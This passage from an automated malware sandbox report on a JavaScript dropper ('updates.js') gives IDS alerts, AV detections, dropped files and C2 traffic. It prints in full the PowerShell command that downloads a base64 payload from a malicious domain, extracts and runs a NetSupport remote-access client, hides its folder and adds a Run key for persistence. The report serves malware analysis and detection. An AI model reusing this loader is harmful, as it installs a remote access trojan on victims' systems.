exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim

                                Remote Access Functionality

                                Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7424, TargetFilename: C:\Users\user\AppData\Roaming\GRDCWLLI20\NSM.LIC
                                Timestamp:07/16/24-22:29:48.775589
                                SID:2054426
                                Source Port:58012
                                Destination Port:53
                                Protocol:UDP
                                Classtype:A Network Trojan was detected
                                Timestamp:2024-07-16T22:29:37.087965+0200
                                SID:2827745
                                Source Port:49731
                                Destination Port:443
                                Protocol:TCP
                                Classtype:Malware Command and Control Activity Detected
                                Timestamp:2024-07-16T22:29:37.087965+0200
                                SID:2857473
                                Source Port:49731
                                Destination Port:443
                                Protocol:TCP
                                Classtype:Malware Command and Control Activity Detected
                                Timestamp:2024-07-16T22:29:54.986481+0200
                                SID:2034559
                                Source Port:49732
                                Destination Port:80
                                Protocol:TCP
                                Classtype:Potential Corporate Privacy Violation
                                Timestamp:2024-07-16T22:30:00.900003+0200
                                SID:2022930
                                Source Port:443
                                Destination Port:49733
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:2024-07-16T22:30:43.615970+0200
                                SID:2022930
                                Source Port:443
                                Destination Port:52098
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:2024-07-16T22:29:48.775589+0200
                                SID:2054426
                                Source Port:58012
                                Destination Port:53
                                Protocol:UDP
                                Classtype:Domain Observed Used for C2 Detected

                                AV Detection

                                Source: http://dfwreds.com/data.php?14991, Avira URL Cloud: Label: malware
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL, ReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, ReversingLabs: Detection: 26%
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exe, ReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 3_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,3_2_110ADA40
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 7_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,7_2_110ADA40
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dll
                                Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BADE4000.00000004.00000800.00020000.00000000.sdmp, client32.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 3_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,3_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 3_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,3_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 3_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,3_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 7_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 7_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 7_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 7_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Code function: 7_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_1106ABD0

                                Software Vulnerabilities

                                Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                Source: Traffic, Snort IDS: 2054426 ET TROJAN ZPHP CnC Domain in DNS Lookup (dfwreds .com) 192.168.2.4:58012 -> 1.1.1.1:53
                                Source: global traffic, HTTP traffic detected: GET /data.php?14991 HTTP/1.1 Host: dfwreds.com Connection: Keep-Alive
                                Source: global traffic, HTTP traffic detected: GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
                                Source: Joe Sandbox View, IP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox View, ASN Name: HVC-ASUS HVC-ASUS
                                Source: unknown, TCP traffic detected without corresponding DNS query: 94.158.245.103
                                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global traffic, DNS traffic detected: DNS query: dfwreds.com
                                Source: global traffic, DNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknown, HTTP traffic detected: POST http://94.158.245.103/fakeurl.htm HTTP/1.1 User-Agent: NetSupport Manager/1.3 Content-Type: application/x-www-form-urlencoded Content-Length: 22 Host: 94.158.245.103 Connection: Keep-Alive CMD=POLL INFO=1 ACK=1
                                Source: client32.exe, String found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe, String found in binary or memory: http://%s/testpage.htm
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB331000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                Source: wscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://graphics.ethz.ch/teaching/scivis_common/Literature/squarifiedTreeMaps.pdf
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jsperf.com/try-catch-performance-overhead
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://momentjs.com/
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BC156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BBE9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BBE9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes&url=$1
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes&url=$2
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes&url=$3
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes?url=$2
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/safety/?frombrowser=yes?url=$3
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/browser/security/internet-fraud.xml
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/browser/security/protection.html
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/browser/security/protection.htmlCopie
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/browser/security/protection.htmlSafe
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com/support/yabrowser/security/sms-fraud.xml
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.uz/safety/?frombrowser=yes&url=$2
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.uz/support/browser/security/internet-fraud.xml
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.uz/support/browser/security/protection.htmlXavfsiz
                                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                                Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_110335A0 GetClipboardFormatNameA,SetClipboardData
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 7_2_110335A0 GetClipboardFormatNameA,SetClipboardData
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 7_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 7_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                Source: Yara match File source: 8.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 3.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 7.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 3.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match File source: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara match File source: 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara match File source: 00000008.00000002.1988422325.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara match File source: Process Memory Space: client32.exe PID: 7968, type: MEMORYSTR
                                Source: Yara match File source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 7_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA

                                System Summary

                                Source: updates.js, type: SAMPLE Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: wscript.exe PID: 7336, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exe
                                Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Process Stats: CPU usage > 49%
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_11113190: GetKeyState,DeviceIoControl,keybd_event
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 7_2_1108C800 _memset,GetVersionExA,OpenWindowStationA,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopA,SetProcessWindowStation,CloseWindowStation,SetHandleInformation,SetHandleInformation,SetHandleInformation,_memset,LoadLibraryA,GetProcAddress,IsBadReadPtr,CreateProcessAsUserA,GetProcAddress,FreeLibrary,MsgWaitForMultipleObjects,MsgWaitForMultipleObjects,PeekMessageA,DispatchMessageA,PeekMessageA,DispatchMessageA,PeekMessageA,MsgWaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetLastError,CloseDesktop,GetLastError,SetProcessWindowStation,CloseWindowStation,GetLastError
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 7_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess
                                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                Source: updates.js Initial sample: Strings found which are bigger than 50
                                Source: updates.js, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: wscript.exe PID: 7336, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: classification engine Classification label: mal100.rans.troj.expl.evad.winJS@8/28@3/3
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_1105A760 GetLastError,FormatMessageA,LocalFree
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_1109D8F0 AdjustTokenPrivileges,FindCloseChangeNotification
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 7_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 7_2_1109D8F0 AdjustTokenPrivileges,CloseHandle
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 3_2_11089430 FindResourceA,LoadResource,LockResource
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Code function: 7_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\GRDCWLLI20
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe Mutant created: NULL
                                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olj24nsh.di3.ps1
                                Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
